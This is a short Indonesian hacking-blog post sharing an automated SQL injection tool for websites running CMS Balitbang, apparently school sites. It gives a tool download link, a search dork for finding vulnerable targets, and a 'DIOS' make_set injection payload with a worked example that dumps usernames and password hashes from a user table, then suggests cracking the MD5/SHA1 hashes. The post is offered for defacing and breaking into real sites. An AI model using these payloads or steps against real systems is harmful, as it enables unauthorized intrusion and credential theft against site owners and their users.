Deface Hacker Hacking Tools

Tools Auto Sql Injection Pada CMS Balitbang

Hallo teman teman Indonesian Darknet kali ini admin mau share tools yang cukup powerfull dan pas banget buat noob kaya admin sendiri :v LOL.
tools ini sebenernya sudah cukup lama cuma admin baru share aja wk
tools ini dibuat oleh Cy#b3r00T dari Team AnarchoXploit.
fungsi dari tools ini sendiri yaitu untuk melakukan sql injection pada website dengan CMS Balitbang yang vulnerable (Rentan).

Link tools : https://www.dragnetid.codes/martabak.php

untuk dorknya bisa pakai ini:

inurl:siswa.php intext:prestasi

atau kembangkan lagi oke.

untuk penggunaannya juga sangat simple hanya perlu memasukan list site yang sekiranya vuln lalu klik inject dan tara website pun terinject. ( Masukan tanpa http/https ! )
cek ss

udah dari situ tinggal dump table dan column nya

cara dump table dan columnnya pake dios ini

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

pada (information_schema.columns) ubah jadi nama table dan pada table_name dan column_name ubah jadi column yang mau di dump

jadi contoh gini

ada table user dan column username dan password jadinya gini

make_set(6,@:=0x0a,(select(1)from(user)where@:=make_set(511,@,0x3c6c693e,username,password)),@)

lalu isikan kembali website yang tadi di inject.

dan tara username dan passwordnya berhasil di dump

untuk tipe hash seperti itu biasanya md5/sha1 jika tidak ketemu hashnya bisa pake hash finder

ya sekiranya admin cuma mau share tools itu aja .

untuk request sesuatu bisa tulis di komen!!!

Thanks you~

Leave a Reply